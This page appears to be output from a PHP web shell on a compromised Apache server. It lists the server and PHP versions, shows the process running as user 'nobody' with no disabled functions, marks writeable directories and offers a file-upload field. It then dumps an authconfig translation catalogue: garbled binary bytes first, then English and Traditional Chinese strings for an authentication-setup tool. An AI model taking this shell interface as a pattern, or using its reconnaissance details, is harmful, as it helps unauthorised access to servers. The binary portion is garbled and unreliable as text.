KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.17
System : Linux localhost 2.6.18-419.el5 #1 SMP Fri Feb 24 22:47:42 UTC 2017 x86_64
User : nobody ( 99)
PHP Version : 5.2.17
Disable Function : NONE
Directory :  /usr/share/locale/zh_TW/LC_MESSAGES/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //usr/share/locale/zh_TW/LC_MESSAGES/authconfig.mo
%
0N1	

&^C(
0BWn;
';QYq 2fm
yk*/
DR_s!xY"'*-	5?DKXk
$+h?Yi"z!"
-5Laiu#} 
   1  	!!2!	O!Y!`!~!!
!(!0!0"14"f"n"["_"B#W#k#~######5$ 7$X$*m$,$ $+$%%18%.j%.%*%%%(&*B&m&-&/&$&<
'1J'7|'+'>')(+I(u(*($(0(-)-D))r)$)')))*,/*.\*#*4*>* #+1D+(v+D+)+0,*?,j,z,G-FP-D-4-.%.D.'X.\.M/+0-0
30A0R0W0`0p0y000000000I0	+1051
f1q1111111122"282-K2
y2222222223'3?3S3f3}33
 4.4:4F44444!5(515SA5555555555
566@)6	j6t6x66	666
6
6w6+787
H7
S7^7e7Mw77
f8jt889(.:!W:#y:
:::::
::	;
;);8;$N;s;;;;;><F<]<y<<<L=
[=i=m=+====4=

>
>#>@>Q>b>*s>->$>->?&&?ZM?]?@@8@J@_@t@@"@@6@!A6AIA-bAA,AAA'B/4BdBB!B$BBB0C!CCNeC$C'C.D-0D^D-wDD,DDE'!E/IEyEEE!EEF0F"OF?rF;FF0G$8G5]G$G*G+G
H|H6H?H9I?KIIII!I0+1*tw.?Fsc=kZo4bxm/H\hnEp~{7RLVg>G%
6`-a)P	MqIY#8e[3uWD!C|,T(5N]ldO iAvQjz@X
2"_J&$UBr;}:9K^f'Sy< <Tab>/<Alt-Tab> between elements   |   <Space> selects   |  <F12> next screen*<URL><b>Options</b><b>Smart Card</b><dn><domain><lowest-highest><module><realm><server><servers><workgroup>ADS Realm:Admin Server:AlertAuthenticationAuthentication ConfigurationAuthentication module %s/pam_%s.so is missing. Authentication process will not work correctly.BackBad smart card removal action specified.Base DN:Cache InformationCache User _InformationCancelCard Removal _ActionCertificate _URLCon_figure SMB...Configure H_esiod...Configure K_erberos...Configure L_DAP...Configure NI_S...Configure Sma_rt Card...Configure Win_bind...Control how the system verifies users who attempt to log inDo_n't SaveDomainDomain Administrator:Domain Controllers:Domain _AdministratorDomain:Download CA CertificateEnable SMB S_upportEnable Smart _Card SupportEnable _Hesiod SupportEnable _Kerberos SupportEnable _LDAP SupportEnable _NIS SupportEnable _Winbind SupportError downloading CA certificateFor user accounts maintained in local /etc/passwd file system will not check authorization from network services such as LDAP or Kerberos.Hesiod SettingsHesiod _LHSHesiod _RHSHesiod allows a system administrator to publish user and group information in DNS.  It is sometimes used in very large networks.IgnoreJoin DomainJoin SettingsJoining Winbind DomainKDC:KerberosKerberos SettingsKerberos is a trusted third-party authentication system which is commonly used in medium to large networks.LDAPLDAP Search _Base DNLDAP SettingsLDAP _ServerLDAP authenticationLHS:Local authorization is sufficientLockNISNIS SettingsNIS _DomainNIS _ServerNIS is the Network Information Service.  It is commonly used on small to medium networks.NextNoOkOptionsPassword:RHS:Realm:SMB SettingsSMB authenticationSMB authentication verifies user passwords by attempting to connect to a server which uses the SMB (system message block) protocol suite.Save SettingsSecurity Model:Server:Servers:Shell:Smart Card SettingsSmart card authentication allows you to log in using a certificate and key associated with a smart card.Some of the configuration changes you've made should be saved to disk before continuing.  If you do not save them, then your attempt to join the domain may fail.  Save changes?Template Shell:The %s file was not found, but it is required for %s support to work properly.
Install the %s package, which provides this file.The Lightweight Directory Access Protocol is a standard way of searching a directory, which can hold arbitrary data in a structured hierarchy. LDAP is increasingly being used in small to large networks.To connect to a LDAP server with TLS protocol enabled you need a CA certificate which signed your server's certificate. Copy the certificate in the PEM format to the '%s' directory.
Then press OK.Use DNS to _locate KDCs for realmsUse DNS to locate KDCs for realmsUse DNS to resolve hosts to realmsUse HesiodUse KerberosUse LDAPUse LDAP AuthenticationUse MD5 PasswordsUse NISUse SMB AuthenticationUse Shadow PasswordsUse TLSUse WinbindUse Winbind AuthenticationUse _DNS to resolve hosts to realmsUse _Shadow PasswordsUse _TLS to encrypt connectionsUser InformationWarningWhen enabled allows network services such as LDAP or Kerberos to authenticate system accounts including root on this machine.WinbindWinbind ADS _RealmWinbind Domain Co_ntrollersWinbind SettingsWinbind _DomainWinbind allows a system to retrieve information about users and to authenticate users by using information stored in an NTDOM or ADS server.  It is used in small to large networks.Winbind authenticationWorkgroup:Yes_Admin Servers_Authenticate system accounts by network services_Domain Controllers_Join Domain_KDCs_Local authorization is sufficient for local users_Password_Realm_Require smart card for login_Security Model_Template Shell_Workgroupaction to be taken on smart card removalauthenticate system accounts by local files onlyauthenticate system accounts by network servicesauthorize local users also through remote servicecachingcan only be run as rootconfigures winbind to assume that users with no domain in their user names are domain usersconfigures winbind to assume that users with no domain in their user names are not domain usersdefault LDAP base DNdefault LDAP serverdefault NIS domaindefault NIS serverdefault hesiod LHSdefault hesiod RHSdefault kerberos KDCdefault kerberos admin serverdefault kerberos realmdefault realm for samba and winbind when security=adsdefault smart card module to usedialog was cancelleddisable LDAP for authentication by defaultdisable LDAP for user information by defaultdisable MD5 passwords by defaultdisable NIS for user information by defaultdisable SMB authentication by defaultdisable authentication with smart card by defaultdisable caching of user information by defaultdisable hesiod for user information by defaultdisable kerberos authentication by defaultdisable shadowed passwords by defaultdisable use of DNS to find kerberos KDCsdisable use of DNS to find kerberos realmsdisable use of TLS with LDAPdisable winbind for authentication by defaultdisable winbind for user information by defaultdisable wins for hostname resolutiondisplay Back instead of Cancel in the main dialog of the TUIdo not display the deprecated text user interfacedo not require smart card for authentication by defaultdo not start/stop portmap, ypbind, and nscddo not update the configuration files, only print new settingsenable LDAP for authentication by defaultenable LDAP for user information by defaultenable MD5 passwords by defaultenable NIS for user information by defaultenable SMB authentication by defaultenable authentication with smart card by defaultenable caching of user information by defaultenable hesiod for user information by defaultenable kerberos authentication by defaultenable shadowed passwords by defaultenable use of DNS to find kerberos KDCsenable use of DNS to find kerberos realmsenable use of TLS with LDAPenable winbind for authentication by defaultenable winbind for user information by defaultenable wins for hostname resolutiongid range winbind will assign to domain or ads usersjoin the winbind domain or ads realm now as this administratorload CA certificate from the URLlocal authorization is sufficient for local usersnames of servers to authenticate againstopposite of --test, update configuration files with changed settingsprobe network for defaults and print themrequire smart card for authentication by defaultsecurity mode to use for samba and winbindshadow passwordthe character which will be used to separate the domain and user part of winbind-created user names if winbindusedefaultdomain is not enabledthe directory which winbind-created users will have as home directoriesthe group which winbind-created users will have as their primary groupthe shell which winbind-created users will have as their login shelluid range winbind will assign to domain or ads usersunexpected argumentupdate all configuration filesusage: %s [options]workgroup authentication servers are inProject-Id-Version: zh_TW
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2008-01-09 21:30+0100
PO-Revision-Date: 2006-11-23 00:22+1000
Last-Translator: Chester Cheng <ccheng@redhat.com>
Language-Team: Chinese, Traditional <zh_TW@li.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Generator: KBabel 1.9.1
 <Tab>/<Alt-Tab> 移動游標   |   <Space> 選取   |  <F12> 下一個畫面*<URL><b>選項</b><b>智慧卡</b><dn><網域><最低-最高><模組><領域><伺服器><伺服器><工作群組>ADS 領域:管理伺服器:警示認證認證設定找不到認證模組 %s/pam_%s.so。認證過程無法正確地運作。上一步指定了不正確的 smart card 移除動作。基底 DN:緩衝區資訊緩衝貯存使用者資訊(_I)取消移除卡片動作(_A)證書 _URL設定 SMB(_f)...設定 H_esiod...設定 K_erberos...設定 L_DAP...設定 NI_S...設定 Sma_rt Card...設定 Win_bind...控制系統如何驗證欲登入的使用者不儲存(_N)網域網域管理員:網域控制器:網域管理員(_A)網域:下載 CA 證書啟用 SMB 支援(_U)啟用 Smart _Card 支援啟用 _Hesiod 支援啟用 _Kerberos 支援啟用 _LDAP 支援啟用 _NIS 支援啟用 _Winbind 支援下載 CA 證書時發生錯誤在本機檔案 /etc/passwd 中維護的使用者帳號,將不會由網路服務(例如 LDAP 或 Kerberos)檢查身份認證Hesiod 設定Hesiod _LHSHesiod _RHSHesiod 允許系統管理者在名稱伺服器(DNS)中發佈使用者與群組的資訊。有時用於超大型的網路中。忽略結合網域結合設定正在加入 Winbind 網域Kerberos 機碼配送中心(KDC):KerberosKerberos 設定Kerberos 是個獲信賴的第三者認證系統, 常用於中型至大型網路。LDAPLDAP 查詢 _Base DNLDAP 設定LDAP 伺服器(_S)LDAP 認證LHS:本機認證即可鎖定NISNIS 設定NIS 網域(_D)NIS 伺服器(_S)NIS 代表網路資訊服務,常用於小型至中型網路。下一步否確定選項密碼:RHS:領域:SMB 設定SMB 認證SMB 認證藉由連線至使用 SMB(系統訊息區塊)通訊協定組的伺服器,來查證使用者的密碼。儲存設定安全模式:伺服器:伺服器:Shell:Smart Card 設定Smart card 身份認證能讓您使用智慧卡的認證與金鑰來登入。在繼續之前,必須儲存您所做的設定變更到磁碟中,假如不儲存的話,當您試著加入網域時將會失敗。 是否要儲存變更?樣板 Shell:找不到 %s 檔案,不過 %s 需要它才能順利執行。
請安裝提供此檔案的 %s 套件。。輕型目錄存取協定(LDAP)使用結構化、階層的方式貯存資料,是搜尋目錄的標準方法,已漸漸被用於小型至大型網路中。要使用 TLS 連上 LDAP 伺服器,您需要一個簽署您伺服器認證的 CA 認證。請將 PEM 格式的認證複製到『%s』目錄。
然後按下「確定」。使用 DNS 來找出領域中的 KDC(_L)使用 DNS 找出領域中的 KDC使用 DNS 將主機解析為領域使用 Hesiod使用 Kerberos使用 LDAP使用 LDAP 認證使用 MD5 密碼使用 NIS使用 SMB 認證使用 Shadow 密碼使用 TLS使用 Winbind使用 Winbind 認證使用 _DNS 將主機解析為領域使用 _Shadow 密碼使用 _TLS 為連線加密使用者資訊警告當啟用這功能時,可允許網路服務(例如 LDAP 或 Kerberos)對包括本機的 root 使用者,進行帳號認證WinbindWinbind ADS 領域(_R)Winbind 網域控制器(_N)Winbind 設定Winbind 網域(_D)Winbind 使得系統可以擷取關於使用者的資訊,並且使用儲存在 NTDOM 或 ADS 伺服器的資訊來認證使用者,通常用於小型至大型的網路中。Winbind 認證工作群組:是管理伺服器(_A)由網路服務進行認證系統帳號(_A)網域控制器(_D)加入網域(_J)_KDCs對本機使用者使用本機認證已經足夠(_L)密碼(_P)領域(_R)登入時需要智慧卡(_R)安全模式(_S)樣板 Shell(_T)工作群組(_W)移除 smart card 時,所採行的動作僅供本機檔案使用的認證系統帳號網路服務用的認證系統帳號本機使用者也要通過遠端服務認證快取只能由系統管理者 (root) 執行設定 winbind 以假設使用者名稱不含網域資訊的使用者為網域的使用者設定 winbind 以假設使用者名稱不含網域資訊的使用者非為網域的使用者預設的 LDAP 基底 DN預設的 LDAP 伺服器預設 NIS 網域預設 NIS 伺服器預設的 hesiod LHS預設的 hesiod RHS預設的 kerberos KDC預設的 kerberos 管理主控台預設的 kerberos 領域當 security=ads 時 samba 與 winbind 的預設領域預設使用的 smart card 模組對話窗已取消預設停用 LDAP 認證預設停用 LDAP 作為使用者資訊來源預設停用 MD5 密碼預設停用 NIS 作為使用者資訊來源預設停用 SMB 認證預設停用 smart card 認證預設停用使用者資訊緩衝貯存預設停用 hesiod 作為使用者資訊來源預設停用 kerberos 認證預設停用 Shadow 密碼不使用 DNS 搜尋 kerberos KDC不使用 DNS 搜尋 kerberos 領域LDAP 不使用 TLS預設停用 winbind 認證預設停用 winbind 作為使用者資訊來源停用 wins 作主機名稱解析在文字用戶介面的主對話窗視顯示『上一步』而非『取消』不要顯示已過時的文字介面預設上,不需要 smart card 認證請勿啟用/停用 portmap、 ypbind 和 nscd不要更新設定檔,只列出新的設定預設啟用 LDAP 認證預設啟用 LDAP 作為使用者資訊來源預設啟用 MD5 密碼預設啟用 NIS 作為使用者資訊來源預設啟用 SMB 認證預設啟用 smart card 認證預設啟用使用者資訊緩衝貯存預設啟用 hesiod 作為使用者資訊來源預設啟用 kerberos 認證預設啟用 Shadow 密碼使用 DNS 搜尋 kerberos KDC使用 DNS 搜尋 kerberos 領域LDAP 使用 TLS預設啟用 winbind 認證預設啟用 winbind 作為使用者資訊來源啟用 wins 作主機名稱解析 gid 範圍的 winbind 將會指派給網域或 ads 的使用者現在以管理員身份加入 winbind 網域或 ads 領域從 URL 載入 CA 證書對本機使用者使用本機認證即已足夠用來對照認證的伺服器名稱與 --test 選項相反,將改動更新到設定檔偵測預設的網路然後列出來預設上,必須啟用 smart card 認證用於 samba 與 winbind 的安全性模式shadow 密碼當停用 winbindusedefaultdomain 時,用來分隔由 winbind 建立之使用者名稱的網域與使用者部份的字元將成為由 winbind 所建立之使用者的家目錄將成為由 winbind 所建立之使用者所屬的主要群組將成為由 winbind 所建立之使用者的登入 shelluid 範圍的 winbind 將會指派給網域或 ads 的使用者非預期的參數更新所有設定檔用法: %s [選項]工作群組認證伺服器是在

Anon7 - 2021